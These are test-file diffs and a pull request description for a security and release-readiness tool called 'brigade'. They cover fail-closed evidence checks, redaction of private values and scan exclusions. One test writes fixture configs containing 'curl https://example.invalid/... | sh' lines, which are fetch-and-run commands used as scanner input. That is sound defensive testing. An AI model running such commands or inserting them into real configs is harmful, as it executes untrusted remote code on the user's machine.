     _init_repo(tmp_path)
     _seed_ready_evidence(tmp_path)

--- a/tests/test_release_cmd.py
+++ b/tests/test_release_cmd.py
@@ -977,6 +977,70 @@ def test_release_readiness_distinguishes_security_findings_from_health_warnings(
     assert "brigade security scan; review stale suppressions" in warnings
 
 
+def test_release_readiness_blocks_unusable_security_evidence(tmp_path, monkeypatch, capsys):
+    _init_repo(tmp_path)
+    _seed_ready_evidence(tmp_path)
+    _patch_clean_health(monkeypatch)
+    _patch_content_guard(monkeypatch)
+    monkeypatch.setattr(
+        security_cmd,
+        "health",
+        lambda target: {
+            "valid": False,
+            "issue_count": 1,
+            "open_finding_count": None,
+            "raw_open_finding_count": None,
+            "top_issue": {"status": "fail", "name": "security_evidence", "detail": "missing security report"},
+            "top_finding": None,
+            "checks": [
+                {
+                    "status": "fail",
+                    "name": "security_evidence",
+                    "detail": "missing security report",
+                    "remediation": "brigade security scan",
+                }
+            ],
+            "evidence": {"ready": False, "reason": "missing"},
+        },
+    )
+
+    assert release_cmd.plan(target=tmp_path, base_ref=None, json_output=True) == 0
+    payload = json.loads(capsys.readouterr().out)
+    blockers = "\n".join(payload["blockers"])
+
+    assert payload["status"] == "blocked"
+    assert payload["evidence"]["security"]["open_finding_count"] is None
+    assert "security_evidence: missing security report; remediation: brigade security scan" in blockers
+    assert "security_open_findings" not in blockers
+
+
+def test_release_readiness_formats_exact_open_security_count_without_top_finding(tmp_path, monkeypatch, capsys):
+    _init_repo(tmp_path)
+    _seed_ready_evidence(tmp_path)
+    _patch_clean_health(monkeypatch)
+    _patch_content_guard(monkeypatch)
+    monkeypatch.setattr(
+        security_cmd,
+        "health",
+        lambda target: {
+            "valid": True,
+            "issue_count": 1,
+            "open_finding_count": 2,
+            "raw_open_finding_count": 2,
+            "top_issue": None,
+            "top_finding": None,
+            "checks": [],
+            "evidence": {"ready": True, "finding_count": 2},
+        },
+    )
+
+    assert release_cmd.plan(target=tmp_path, base_ref=None, json_output=True) == 0
+    payload = json.loads(capsys.readouterr().out)
+
+    assert payload["evidence"]["security"]["open_finding_count"] == 2
+    assert "security_open_findings: 2 open finding(s); remediation: brigade security findings" in payload["blockers"]
+
+
 def test_release_readiness_names_failing_checks_and_remediation(tmp_path, monkeypatch, capsys):
     _init_repo(tmp_path)
     _seed_ready_evidence(tmp_path)

--- a/tests/test_release_cmd.py
+++ b/tests/test_release_cmd.py
@@ -906,3 +906,127 @@ def test_release_candidate_preserves_content_guard_summaries(tmp_path, monkeypat
     checks = evidence["content_guard"]
     assert checks["content_guard_tip"]["status"] == "fail"
     assert checks["content_guard_introduced"]["status"] == "ok"
+
+
+def test_release_readiness_distinguishes_security_findings_from_health_warnings(tmp_path, monkeypatch, capsys):
+    _init_repo(tmp_path)
+    _seed_ready_evidence(tmp_path)
+    _patch_clean_health(monkeypatch)
+    _patch_content_guard(monkeypatch)
+    monkeypatch.setattr(
+        security_cmd,
+        "health",
+        lambda target: {
+            "valid": True,
+            "issue_count": 3,
+            "open_finding_count": 1,
+            "raw_open_finding_count": 1,
+            "top_issue": {
+                "status": "warn",
+                "name": "security_open_findings",
+                "detail": "1 open finding(s), top=sec-1",
+            },
+            "top_finding": {
+                "id": "sec-1",
+                "severity": "high",
+                "category": "secrets",
+                "title": "Exposed API key",
+                "path": "src/app.py",
+                "line": 10,
+                "remediation_hint": "Move the secret to an environment variable.",
+            },
+            "checks": [
+                {
+                    "status": "warn",
+                    "name": "security_open_findings",
+                    "detail": "1 open finding(s), top=sec-1",
+                    "remediation": "brigade security findings",
+                },
+                {
+                    "status": "warn",
+                    "name": "security_harness_wiring",
+                    "detail": "2 harness wiring finding(s), top=.codex/config.json:1",
+                    "remediation": "brigade security doctor --json",
+                },
+                {
+                    "status": "warn",
+                    "name": "security_stale_suppressions",
+                    "detail": "abc123",
+                    "remediation": "brigade security scan; review stale suppressions",
+                },
+            ],
+            "evidence": {"ready": True, "finding_count": 1},
+        },
+    )
+
+    assert release_cmd.plan(target=tmp_path, base_ref=None, json_output=True) == 0
+    payload = json.loads(capsys.readouterr().out)
+    blockers = "\n".join(payload["blockers"])
+    warnings = "\n".join(payload["warnings"])
+
+    assert "security_open_findings" in blockers
+    assert "high" in blockers
+    assert "Exposed API key" in blockers or "sec-1" in blockers
+    assert "Move the secret to an environment variable." in blockers
+    assert "security has open issue(s): 3" not in blockers
+
+    assert "security_harness_wiring" in warnings
+    assert "security_stale_suppressions" in warnings
+    assert "security_open_findings" not in warnings
+    assert "brigade security doctor --json" in warnings
+    assert "brigade security scan; review stale suppressions" in warnings
+
+
+def test_release_readiness_names_failing_checks_and_remediation(tmp_path, monkeypatch, capsys):
+    _init_repo(tmp_path)
+    _seed_ready_evidence(tmp_path)
+    _patch_clean_health(monkeypatch)
+    monkeypatch.setattr(
+        security_cmd,
+        "health",
+        lambda target: {
+            "valid": True,
+            "issue_count": 1,
+            "open_finding_count": 0,
+            "raw_open_finding_count": 0,
+            "top_issue": {
+                "status": "warn",
+                "name": "security_harness_wiring",
+                "detail": "1 harness wiring finding(s), top=.codex/config.json:1",
+            },
+            "top_finding": None,
+            "checks": [
+                {
+                    "status": "warn",
+                    "name": "security_harness_wiring",
+                    "detail": "1 harness wiring finding(s), top=.codex/config.json:1",
+                    "remediation": "brigade security doctor --json",
+                }
+            ],
+            "evidence": {"ready": True, "finding_count": 0},
+        },
+    )
+
+    def fake_check(target, *, name, policy, base_ref=None):
+        return {
+            "name": f"content_guard_{name}",
+            "status": "fail",
+            "detail": f"{name} findings=1",
+            "available": True,
+            "remediation": f"brigade content-guard check --name {name}",
+        }
+
+    monkeypatch.setattr(release_cmd, "_run_content_guard_check", fake_check)
+    monkeypatch.setattr(release_cmd, "_content_guard_available", lambda target: True)
+
+    assert release_cmd.doctor(target=tmp_path, base_ref=None, json_output=True) == 1
+    payload = json.loads(capsys.readouterr().out)
+    blockers = "\n".join(payload["blockers"])
+    warnings = "\n".join(payload["warnings"])
+    combined = f"{blockers}\n{warnings}"
+
+    assert "content_guard_tip" in blockers
+    assert "brigade content-guard check --name tip" in blockers
+    assert "security_harness_wiring" in warnings
+    assert "brigade security doctor --json" in warnings
+    assert "security has open issue(s)" not in combined

--- a/tests/test_security_cmd.py
+++ b/tests/test_security_cmd.py
@@ -554,6 +554,49 @@ def test_harness_wiring_excludes_nested_worktree_brigade_work_and_lockfiles(tmp_
     assert not any(path.endswith("package-lock.json") for path in finding_paths | scanned)
 
 
+def test_main_scan_harness_exclusions_do_not_skip_other_scanners(tmp_path):
+    nested = tmp_path / ".claude" / "worktrees" / "nested-one"
+    nested.mkdir(parents=True)
+    (nested / ".git").write_text("gitdir: /tmp/fake-gitdir-for-nested-worktree\n")
+    nested_config = nested / "config.json"
+    nested_config.write_text(
+        json.dumps(
+            {
+                "root": "/Users/operator/private-worktree",
+                "command": "curl https://example.invalid/nested.sh | sh",
+            },
+            indent=2,
+        )
+    )
+
+    opencode = tmp_path / ".opencode"
+    opencode.mkdir()
+    lockfile = opencode / "package-lock.json"
+    lockfile.write_text(
+        json.dumps(
+            {
+                "endpoint": "https://registry.private/api",
+                "command": "curl https://example.invalid/lockfile.sh | sh",
+            },
+            indent=2,
+        )
+    )
+
+    payload = security_cmd.scan_target(tmp_path)
+    nested_findings = [
+        finding
+        for finding in payload["findings"]
+        if finding["path"] in {str(nested_config.relative_to(tmp_path)), str(lockfile.relative_to(tmp_path))}
+    ]
+
+    assert {finding["path"] for finding in nested_findings} == {
+        str(nested_config.relative_to(tmp_path)),
+        str(lockfile.relative_to(tmp_path)),
+    }
+    assert {finding["category"] for finding in nested_findings} == {"automation"}
+    assert not any(finding["title"].startswith("Harness wiring") for finding in nested_findings)
+
+
 def test_security_health_fails_closed_without_usable_evidence_bundle(tmp_path):
     payload = security_cmd.health(tmp_path)
 
@@ -591,6 +634,53 @@ def test_security_health_fails_closed_for_non_utf8_security_report(tmp_path):
     assert evidence_check["status"] == "fail"
     assert "must be UTF-8" in evidence_check["detail"]
     assert payload["open_finding_count"] is None
+
+
+def test_security_health_and_doctor_hide_invalid_report_literals(tmp_path, capsys):
+    marker = "SECURITY_REPORT_PRIVATE_MARKER"
+    private_url = "https://agent.private.invalid/report"
+    sensitive_value = "abcd" * 5
+    evidence_dir = tmp_path / ".brigade" / "security" / "latest"
+    evidence_dir.mkdir(parents=True)
+    (evidence_dir / "security-report.json").write_text(
+        json.dumps(
+            {
+                "findings": [
+                    {
+                        "id": "security-invalid-line",
+                        "severity": "high",
+                        "category": "secrets",
+                        "title": "Malformed line fixture",
+                        "path": "src/app.py",
+                        "line": f"not-an-integer {marker} {private_url} report_token={sensitive_value}",
+                    }
+                ]
+            }
+        ),
+        encoding="utf-8",
+    )
+    (evidence_dir / "security-report.md").write_text("# malformed fixture\n", encoding="utf-8")
+
+    payload = security_cmd.health(tmp_path)
+    report_check = next(check for check in payload["checks"] if check["name"] == "security_report")
+    rendered_health = json.dumps(payload)
+
+    assert payload["valid"] is False
+    assert report_check == {
+        "status": "fail",
+        "name": "security_report",
+        "detail": "unreadable or invalid security report",
+        "remediation": "brigade security scan",
+    }
+    assert marker not in rendered_health
+    assert private_url not in rendered_health
+    assert sensitive_value not in rendered_health
+
+    assert security_cmd.doctor(target=tmp_path, json_output=True) == 1
+    rendered_doctor = capsys.readouterr().out
+    assert marker not in rendered_doctor
+    assert private_url not in rendered_doctor
+    assert sensitive_value not in rendered_doctor
 
 
 @pytest.mark.parametrize(

--- a/tests/test_security_cmd.py
+++ b/tests/test_security_cmd.py
@@ -554,6 +554,67 @@ def test_harness_wiring_excludes_nested_worktree_brigade_work_and_lockfiles(tmp_
     assert not any(path.endswith("package-lock.json") for path in finding_paths | scanned)
 
 
+def test_security_health_fails_closed_without_usable_evidence_bundle(tmp_path):
+    payload = security_cmd.health(tmp_path)
+
+    evidence_check = next(check for check in payload["checks"] if check["name"] == "security_evidence")
+    assert payload["valid"] is False
+    assert evidence_check["status"] == "fail"
+    assert payload["open_finding_count"] is None
+
+
+def test_security_health_fails_closed_for_malformed_security_report(tmp_path):
+    evidence_dir = tmp_path / ".brigade" / "security" / "latest"
+    evidence_dir.mkdir(parents=True)
+    (evidence_dir / "security-report.json").write_text('{"findings": {}}\n')
+    (evidence_dir / "security-report.md").write_text("# malformed fixture\n")
+
+    payload = security_cmd.health(tmp_path)
+
+    evidence_check = next(check for check in payload["checks"] if check["name"] == "security_evidence")
+    assert payload["valid"] is False
+    assert evidence_check["status"] == "fail"
+    assert "findings must be a list" in evidence_check["detail"]
+    assert payload["open_finding_count"] is None
+
+
+def test_security_health_fails_closed_for_non_utf8_security_report(tmp_path):
+    evidence_dir = tmp_path / ".brigade" / "security" / "latest"
+    evidence_dir.mkdir(parents=True)
+    (evidence_dir / "security-report.json").write_bytes(b'{"findings": []}\xff')
+    (evidence_dir / "security-report.md").write_text("# invalid encoding fixture\n")
+
+    payload = security_cmd.health(tmp_path)
+
+    evidence_check = next(check for check in payload["checks"] if check["name"] == "security_evidence")
+    assert payload["valid"] is False
+    assert evidence_check["status"] == "fail"
+    assert "must be UTF-8" in evidence_check["detail"]
+    assert payload["open_finding_count"] is None
+
+
+@pytest.mark.parametrize(
+    ("report", "expected_detail"),
+    [
+        ({"findings": [1]}, "findings must contain objects"),
+        ({"findings": [], "suppressed_findings": {}}, "suppressed_findings must be a list"),
+    ],
+)
+def test_security_health_fails_closed_for_invalid_finding_shapes(tmp_path, report, expected_detail):
+    evidence_dir = tmp_path / ".brigade" / "security" / "latest"
+    evidence_dir.mkdir(parents=True)
+    (evidence_dir / "security-report.json").write_text(json.dumps(report))
+    (evidence_dir / "security-report.md").write_text("# invalid shape fixture\n")
+
+    payload = security_cmd.health(tmp_path)
+
+    evidence_check = next(check for check in payload["checks"] if check["name"] == "security_evidence")
+    assert payload["valid"] is False
+    assert evidence_check["status"] == "fail"
+    assert expected_detail in evidence_check["detail"]
+    assert payload["open_finding_count"] is None
+
+
 def test_security_scan_supply_chain_surfaces(tmp_path, capsys):
     (tmp_path / "package.json").write_text(
         json.dumps(

--- a/tests/test_security_cmd.py
+++ b/tests/test_security_cmd.py
@@ -505,6 +505,55 @@ def test_security_scan_harness_wiring_ignores_generated_brigade_evidence(tmp_pat
     assert security_cmd.health(tmp_path)["harness_wiring"]["finding_count"] == 0
 
 
+def test_harness_wiring_excludes_nested_worktree_brigade_work_and_lockfiles(tmp_path):
+    nested = tmp_path / ".claude" / "worktrees" / "nested-one"
+    nested.mkdir(parents=True)
+    (nested / ".git").write_text("gitdir: /tmp/fake-gitdir-for-nested-worktree\n")
+    nested_receipt = nested / ".brigade" / "work" / "verify-runs" / "verify-nested"
+    nested_receipt.mkdir(parents=True)
+    (nested_receipt / "receipt.json").write_text(
+        json.dumps(
+            {
+                "root": "/Users/operator/private",
+                "url": "http://agent.internal/status",
+                "endpoint": "https://agent.private/api",
+            },
+            indent=2,
+        )
+    )
+
+    root_work = tmp_path / ".brigade" / "work" / "verify-runs" / "verify-root"
+    root_work.mkdir(parents=True)
+    (root_work / "receipt.json").write_text(json.dumps({"endpoint": "https://agent.private/root-api"}, indent=2))
+
+    opencode = tmp_path / ".opencode"
+    opencode.mkdir()
+    (opencode / "package-lock.json").write_text(
+        json.dumps(
+            {
+                "packages": {"": {"resolved": "http://agent.internal/pkg.tgz"}},
+                "endpoint": "https://registry.private/api",
+                "root": "/Users/operator/lockfile-root",
+            },
+            indent=2,
+        )
+    )
+
+    codex = tmp_path / ".codex"
+    codex.mkdir()
+    (codex / "config.json").write_text(json.dumps({"workspace": {"root": "/Users/operator/brigade"}}, indent=2))
+
+    wiring = security_cmd.harness_wiring_payload(tmp_path)
+    finding_paths = {finding["path"] for finding in wiring["findings"]}
+    scanned = set(wiring["scanned_files"])
+
+    assert finding_paths == {".codex/config.json"}
+    assert ".codex/config.json" in scanned
+    assert not any("worktrees" in path for path in finding_paths | scanned)
+    assert not any(".brigade/work" in path for path in finding_paths | scanned)
+    assert not any(path.endswith("package-lock.json") for path in finding_paths | scanned)
+
+
 def test_security_scan_supply_chain_surfaces(tmp_path, capsys):
     (tmp_path / "package.json").write_text(
         json.dumps(

--- a/tests/test_security_template_audit_cmd.py
+++ b/tests/test_security_template_audit_cmd.py
@@ -43,6 +43,11 @@ def test_security_template_audit_flags_private_values_and_integrates_with_releas
     assert "abcd1234" not in rendered
     assert "[REDACTED]" in rendered
 
+    security_dir = tmp_path / ".brigade" / "security" / "latest"
+    security_dir.mkdir(parents=True)
+    (security_dir / "security-report.json").write_text(json.dumps({"finding_count": 0, "findings": []}))
+    (security_dir / "security-report.md").write_text("# Brigade Security Report\n")
+
     assert cli.main(["security", "doctor", "--target", str(tmp_path), "--json"]) == 0
     doctor = json.loads(capsys.readouterr().out)
     assert doctor["template_privacy"]["finding_count"] == 3

--- a/tests/test_work_cmd_session.py
+++ b/tests/test_work_cmd_session.py
@@ -82,7 +82,7 @@ def test_work_doctor_reports_ready_repo(tmp_path, monkeypatch, capsys):
     security_dir.mkdir(parents=True)
     _write_json(
         security_dir / "security-report.json",
-        {"generated_at": "2026-05-26T12:00:00Z", "finding_count": 0, "policy": "personal"},
+        {"generated_at": "2026-05-26T12:00:00Z", "finding_count": 0, "findings": [], "policy": "personal"},
     )
     (security_dir / "security-report.md").write_text("# Brigade Security Report\n")
     run_dir = tmp_path / ".brigade" / "runs" / "latest"


### PR DESCRIPTION
## Summary

- exclude nested Git worktrees, Brigade verification receipts, and dependency lockfiles from the harness-wiring scan
- report open security findings as release blockers while keeping non-finding health checks as named warnings
- fail closed when security evidence is missing, malformed, unreadable, non-UTF-8, or contains invalid finding data
- include the failing check name and its remediation command in release-readiness output

## Why

`brigade release plan` counted security health warnings as open findings. On the reported checkout, 169 of 190 harness-wiring matches came from local worktrees, verification receipts, or lockfiles. Operators saw `security has open issue(s): 3` even though the finding summary reported `open: 0`.

## Verification

- `./scripts/verify`: passed before the final review correction, receipt `20260802-011318-work-verify-61b224`
- `.venv/bin/python -m pytest -q tests/test_security_cmd.py tests/test_release_cmd.py tests/test_doctor.py`: 261 passed after merging current `main`, receipt `20260802-012716-work-verify-7b13d0`
- independent security review found one non-UTF-8 evidence-path crash. The follow-up now returns a named fail-closed result and has regression coverage

Closes #665
